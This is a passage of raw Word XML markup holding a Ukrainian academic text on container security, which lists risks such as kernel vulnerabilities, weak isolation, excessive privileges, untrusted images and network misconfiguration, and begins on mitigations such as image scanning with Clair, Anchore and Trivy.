          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ційним інструментам, таким як Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, контейнери можна швидко масштабувати та автоматизувати.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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Портативність.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Контейнеризовані додатки можна без змін переносити між різними середовищами (локальні машини, сервери, хмарні платформи).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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Ізоляція.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Контейнери ізолюють додатки від інш</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, що знижує ризики взаємодії між ними.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="002865BF" w:rsidP="00CB205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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Попри численні переваги, контейнери мають ряд потенційних уразливостей, які можуть стати цілями для атак. Оскільки контейнери не мають власної </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, вони залежать від безпеки ядра хостової машини. У разі успішної атаки на контейнер, зловмисник може отримати доступ до інших контейнерів або навіть до всієї хост-системи</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [8]</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="002865BF" w:rsidP="00CB205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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Отже, нижче наведені існуючі ризики безпеки контейнерів</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [8]</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Уразливості ядра</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Контейнери використовують ядро хост-системи, що означає, що будь-яка вразливість в ядрі може призвести до компрометації всіх контейнерів на цьому хості. Якщо зловмисник отримає доступ до контейнера і вдасться експлуатувати уразливість ядра, він може вийти з контейнера і отримати доступ до хоста або інших контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003400C8" w:rsidRDefault="00B7322A" w:rsidP="00CB205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 Проблеми ізоляції. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Ізоляція контейнерів зале</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>жить від механізмів, таких як Namespaces та Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, але ці механізми не завжди забезпечують абсолютну ізоляцію. Якщо конфігурація контейнера дозволяє йому порушити ізоляцію, зловмисник може отримати доступ до </w:t>
      </w:r>
      <w:r w:rsidR="003400C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ресурсів</w:t>
      </w:r>
      <w:r w:rsidR="003400C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> інших </w:t>
      </w:r>
      <w:r w:rsidR="003400C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>контейнерів</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00CB205D" w:rsidP="003400C8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>або хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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 Надмірні привілеї. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Контейнери часто працюють з підвищеними привілеями, що може призвести до небажаних наслідків. Наприклад</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, запуск контейнера з правами root</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> може дозволити зловмиснику отримати доступ до всієї системи, якщо контейнер зламано.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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 Ненадійні образи контейнерів. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Важливим аспектом безпеки є використання образів контейнерів. Відкриті репозиторії можуть містити шкідливі або застарілі образи, що включають уразливості. Завантаження таких образів може поставити під загрозу безпеку всієї інфраструктури.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Н</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">еправильне налаштування мережі. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Контейнери зазвичай мають окремі мережеві інтерфейси, але їх неправильне налаштування може створити </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>можливості для атак, таких як MITM</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Man-in-the-Middle), де зловмисник може перехопити трафік між контейнерами або між контейнером і хостом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Використ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ання несанкціонованих ресурсів. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Існує також ризик несанкціонованого використання ресурсів, таких як файли, пристрої або мережеві інтерфейси, якщо контейнер має доступ до них, що дозволяє виявити уразливості або реалізувати атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="002865BF" w:rsidP="00CB205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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Існує кілька стратегій і практик, які можуть допомогти знизити ризики, пов'язані з використанням контейнерів</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> та забезпечити їх безпеку</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [9]</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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1. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Забезпечен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ня безпеки образів контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Сканування обр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>азів на наявність уразливостей.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Перш ніж використовувати образи, важливо перевірити їх на наявність відомих вразливостей за до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>помогою інструментів, таких як Clair, Anchore, Trivy</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Використанн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
